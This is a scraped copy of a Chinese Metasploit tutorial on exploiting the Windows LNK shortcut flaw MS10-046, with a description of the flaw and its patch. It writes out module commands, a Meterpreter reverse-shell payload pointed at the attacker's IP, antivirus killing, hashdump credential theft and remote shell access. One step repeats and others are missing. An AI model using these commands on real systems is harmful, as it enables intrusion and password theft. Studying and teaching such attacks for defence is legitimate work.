Metasploit Framework应用实例.docx

上传人:b****3 文档编号:11204044 上传时间:2023-05-29 格式:DOCX 页数:22 大小:256.38KB
下载 相关 举报
Metasploit Framework应用实例.docx_第1页
第1页 / 共22页
Metasploit Framework应用实例.docx_第2页
第2页 / 共22页
Metasploit Framework应用实例.docx_第3页
第3页 / 共22页
Metasploit Framework应用实例.docx_第4页
第4页 / 共22页
Metasploit Framework应用实例.docx_第5页
第5页 / 共22页
Metasploit Framework应用实例.docx_第6页
第6页 / 共22页
Metasploit Framework应用实例.docx_第7页
第7页 / 共22页
Metasploit Framework应用实例.docx_第8页
第8页 / 共22页
Metasploit Framework应用实例.docx_第9页
第9页 / 共22页
Metasploit Framework应用实例.docx_第10页
第10页 / 共22页
Metasploit Framework应用实例.docx_第11页
第11页 / 共22页
Metasploit Framework应用实例.docx_第12页
第12页 / 共22页
Metasploit Framework应用实例.docx_第13页
第13页 / 共22页
Metasploit Framework应用实例.docx_第14页
第14页 / 共22页
Metasploit Framework应用实例.docx_第15页
第15页 / 共22页
Metasploit Framework应用实例.docx_第16页
第16页 / 共22页
Metasploit Framework应用实例.docx_第17页
第17页 / 共22页
Metasploit Framework应用实例.docx_第18页
第18页 / 共22页
Metasploit Framework应用实例.docx_第19页
第19页 / 共22页
Metasploit Framework应用实例.docx_第20页
第20页 / 共22页
亲,该文档总共22页,到这儿已超出免费预览范围,如果喜欢就下载吧!
下载资源
资源描述

Metasploit Framework应用实例.docx

《Metasploit Framework应用实例.docx》由会员分享,可在线阅读,更多相关《Metasploit Framework应用实例.docx(22页珍藏版)》请在冰点文库上搜索。

Metasploit Framework应用实例.docx

MetasploitFramework应用实例

首页

技术频道

51CTO旗下网站

地图

社区:

论坛博客下载读书更多

登录注册

∙组网

∙安全

∙开发

∙数据库

∙服务器

∙系统

∙虚拟化

∙云计算

∙嵌入式

∙移动开发

∙51CTO.COM

∙CIO

∙WatchS

∙HC

∙灵客风LinkPhone

∙家园

∙微博

∙博客

∙论坛

∙下载

∙自测

∙门诊

∙周刊

∙读书

∙技术圈

∙知道

∙深信服下一代防火墙正式发布

∙开发WP7应用,赢“芒果”手机!

∙CIO谈高效企业---分享成功经验

∙中国客户使用的虚拟化方案

MetasploitFramework应用实例:

代码漏洞攻击

(1)

2011-06-1314:

56《BT4Linux黑客手册》51CTO.com我要评论()字号:

T|T

Windows支持使用快捷方式或LNK文件。

LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。

MicrosoftWindows快捷方式LNK文件自动执行代码漏洞攻击(MS10-046)

MetasploitFramework软件介绍及下载:

◆漏洞描述

1、漏洞定义

Windows支持使用快捷方式或LNK文件。

LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。

Windows没有正确地处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。

这些代码可能位于USB驱动、本地或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。

默认下Windows启动了自动加载和自动播放功能,因此在连接可移动设备(如USB闪存)后Windows会自动打开资源管理器。

其他显示文件图标的应用也可用作这个漏洞的攻击载体。

受影响的Windows系统如下表1所示:

表1

漏洞名称

受影响的Windows系统类型

MS10-046

MicrosoftWindowsXPSP3

MicrosoftWindowsXPSP2

MicrosoftWindowsVistaSP2

MicrosoftWindowsVistaSP1

MicrosoftWindowsServer2008

MicrosoftWindowsServer2008SP2

MicrosoftWindowsServer2008R2

MicrosoftWindowsServer2003SP2

MicrosoftWindows7

2、关于补丁

Microsoft已经为此发布了一个安全公告(MS10-046)以及相应补丁:

MS10-046:

VulnerabilityinWindowsShellCouldAllowRemoteCodeExecution(2286198),其详细说明文档的链接如下:

此安全更新解决了WindowsShell中一个公开披露的漏洞。

如果显示特制的快捷方式图标,则该漏洞可能允许远程执行代码。

成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。

除了使用Windows系统自带的自动更新来升级补丁外,也可以使用360安全卫士之类的第三方工具来实现。

首页

技术频道

51CTO旗下网站

地图

社区:

论坛博客下载读书更多

登录注册

∙组网

∙安全

∙开发

∙数据库

∙服务器

∙系统

∙虚拟化

∙云计算

∙嵌入式

∙移动开发

∙51CTO.COM

∙CIO

∙WatchS

∙HC

∙灵客风LinkPhone

∙家园

∙微博

∙博客

∙论坛

∙下载

∙自测

∙门诊

∙周刊

∙读书

∙技术圈

∙知道

∙深信服下一代防火墙正式发布

∙开发WP7应用,赢“芒果”手机!

∙CIO谈高效企业---分享成功经验

∙中国客户使用的虚拟化方案

首页|动态|病毒|漏洞|黑客|ARP|嗅探扫描|Web安全|邮件安全| 全部文章

窗体顶端

窗体底端

您所在的位置:

网络安全>安全工具>MetasploitFramework应用实例:

代码漏洞攻击

(2)

MetasploitFramework应用实例:

代码漏洞攻击

(2)

2011-06-1314:

56《BT4Linux黑客手册》51CTO.com我要评论()字号:

T|T

Windows支持使用快捷方式或LNK文件。

LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。

AD:

◆攻击操作

接下来,我们开始使用Metasploit3进行溢出攻击,下面为详细步骤。

步骤1:

进入Metasploit,载入攻击代码。

作为攻击者而言,首先是进入Metasploit。

除了从菜单上直接点选进入Metasploit外,我们也可以在图形界面下打开任意一个Shell,直接输入msfconsole命令来进入Metasploit。

如下图-1所示,可以看到当前包含代码数量、参数状态及最新版本等。

图-1

命令如下:

searchms10_046

回车后即可看到如下图-2所示的搜索结果,显示存在一个名为"ms10_046_shortcut_icon_dllloader"的可用攻击代码。

接下来,就可以载入该攻击代码,具体命令如下:

usewindows/browser/ms10_046_shortcut_icon_dllloader

回车后如下图所示,就载入了该攻击代码。

图-2

在使用一个攻击代码前,需要先查看其必需的设置参数有哪些,所以先要输入如下命令:

showoptions

回车后即可看到该攻击代码的设置参数,如下图-3所示,在图中间可以看到SRVHOST、SRVPORT、URIPATH这三个参数是必须的,其中,SRVPORT和URIPATH是已经默认设置好的。

图-3

首页

技术频道

51CTO旗下网站

地图

社区:

论坛博客下载读书更多

∙组网

∙安全

∙开发

∙数据库

∙服务器

∙系统

∙虚拟化

∙云计算

∙嵌入式

∙移动开发

∙51CTO.COM

∙CIO

∙WatchS

∙HC

∙灵客风LinkPhone

∙家园

∙微博

∙博客

∙论坛

∙下载

∙自测

∙门诊

∙周刊

∙读书

∙技术圈

∙知道

首页|动态|病毒|漏洞|黑客|ARP|嗅探扫描|Web安全|邮件安全| 全部文章

窗体顶端

窗体底端

您所在的位置:

网络安全>安全工具>MetasploitFramework应用实例:

代码漏洞攻击(3)

MetasploitFramework应用实例:

代码漏洞攻击(3)

2011-06-1314:

56《BT4Linux黑客手册》51CTO.com我要评论(0)字号:

T|T

Windows支持使用快捷方式或LNK文件。

LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。

AD:

步骤2:

在Metasploit3上配置攻击代码。

既然知道了必需的配置参数,接下来就可以使用set命令来依次配置参数。

其中,设置溢出有效载荷为反向溢出,而为了使用到Metasploit中的具备强化Shell功能的Meterpreter,所以设置为PAYLOAD为windows/metepreter/reverse_tcp此外,由于后面攻击者还要使用ettercap对目标进行DNS欺骗攻击,所以攻击者应要将反弹端口的目的地设置为自身IP,即设置LHOST为自身IP。

最后,使用exploit执行溢出。

具体命令如下:

set  SRVHOST  攻击者自身IP

set  PAYLOAD  windows/meterpreter/reverse_tcp

set  LHOST  攻击者自身IP

exploit

依次输入回车后如下图-4所示,会显示为启用一个URL地址为http:

//10.23.0.3:

80,对应一个共享目录\\10.23.0.3\owhBPhxMJ\。

图-4

首页

技术频道

51CTO旗下网站

地图

社区:

论坛博客下载读书更多

∙组网

∙安全

∙开发

∙数据库

∙服务器

∙系统

∙虚拟化

∙云计算

∙嵌入式

∙移动开发

∙51CTO.COM

∙CIO

∙WatchS

∙HC

∙灵客风LinkPhone

∙家园

∙微博

∙博客

∙论坛

∙下载

∙自测

∙门诊

∙周刊

∙读书

∙技术圈

∙知道

首页|动态|病毒|漏洞|黑客|ARP|嗅探扫描|Web安全|邮件安全| 全部文章

窗体顶端

窗体底端

您所在的位置:

网络安全>安全工具>MetasploitFramework应用实例:

代码漏洞攻击(3)

MetasploitFramework应用实例:

代码漏洞攻击(3)

2011-06-1314:

56《BT4Linux黑客手册》51CTO.com我要评论(0)字号:

T|T

Windows支持使用快捷方式或LNK文件。

LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。

AD:

步骤2:

在Metasploit3上配置攻击代码。

既然知道了必需的配置参数,接下来就可以使用set命令来依次配置参数。

其中,设置溢出有效载荷为反向溢出,而为了使用到Metasploit中的具备强化Shell功能的Meterpreter,所以设置为PAYLOAD为windows/metepreter/reverse_tcp此外,由于后面攻击者还要使用ettercap对目标进行DNS欺骗攻击,所以攻击者应要将反弹端口的目的地设置为自身IP,即设置LHOST为自身IP。

最后,使用exploit执行溢出。

具体命令如下:

set  SRVHOST  攻击者自身IP

set  PAYLOAD  windows/meterpreter/reverse_tcp

set  LHOST  攻击者自身IP

exploit

依次输入回车后如下图-4所示,会显示为启用一个URL地址为http:

//10.23.0.3:

80,对应一个共享目录\\10.23.0.3\owhBPhxMJ\。

图-4

首页

技术频道

51CTO旗下网站

地图

社区:

论坛博客下载读书更多

登录注册

∙组网

∙安全

∙开发

∙数据库

∙服务器

∙系统

∙虚拟化

∙云计算

∙嵌入式

∙移动开发

∙51CTO.COM

∙CIO

∙WatchS

∙HC

∙灵客风LinkPhone

∙家园

∙微博

∙博客

∙论坛

∙下载

∙自测

∙门诊

∙周刊

∙读书

∙技术圈

∙知道

∙深信服下一代防火墙正式发布

∙开发WP7应用,赢“芒果”手机!

∙CIO谈高效企业---分享成功经验

∙中国客户使用的虚拟化方案

首页|动态|病毒|漏洞|黑客|ARP|嗅探扫描|Web安全|邮件安全| 全部文章

窗体顶端

窗体底端

您所在的位置:

网络安全>安全工具>MetasploitFramework应用实例:

代码漏洞攻击(5)

MetasploitFramework应用实例:

代码漏洞攻击(5)

2011-06-1314:

56《BT4Linux黑客手册》51CTO.com我要评论()字号:

T|T

Windows支持使用快捷方式或LNK文件。

LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。

AD:

步骤5:

入侵后在目标主机执行命令。

为了方便安全渗透测试人员可以更深入地研究漏洞的危害性,强化了的Meterpreter里也内置了大量的工具及命令。

举几个例子:

ps  列出当前运行的全部程序

如下图-12所示,输入ps回车后会显示出该Windows上当前运行的全部程序进程,攻击者将根据需要使用kill来杀掉某个进程,比如杀毒软件。

图-12

为了扩展一下思路,我们再来看看如何获取受害者主机上的密码Hash。

具体命令如下:

use priv  使用特权工具

hashdump  获取Windows所有用户密码Hash值

依次输入上述命令然后回车后就可看到如下图-13所示内容,攻击者成功地获取到了目标主机上的全部用户列表及对应的密码Hash表。

这个Hash表的内容只要导入Ophcrack之类的工具中就可以轻松地破解,而关于Ophcrack的具体使用大家可以参考本书的10.1节,这里就不再重复描述。

图-13

当然,可能有的朋友要说,在这个meterpreter里面很难输入Windows命令。

哦,是的,貌似是这样,但是没关系,我们可以很容易地解决这个小问题。

只要输入shell这个命令,攻击者就能够进入到目标主机的CMD界面中。

如下图-14所示,只需要驶入shell,回车后攻击者就可以进入到CMD的界面中,在这个界面里任何CMD下支持的命令都可以执行,比如使用ipconfig来显示当前IP地址。

如下图-14所示,我们确实看到当前IP显示为10.23.0.4,对,我们现在就在受害者的主机里。

至于添加账户之类的命令就由小黑们按照想法自行使用啦。

图-14

好了,到这里,Metasploit3的基本使用,我想大家都已经学会了。

展开阅读全文
相关资源
猜你喜欢
相关搜索
资源标签

当前位置:首页 > 表格模板 > 合同协议

copyright@ 2008-2023 冰点文库 网站版权所有

经营许可证编号:鄂ICP备19020893号-2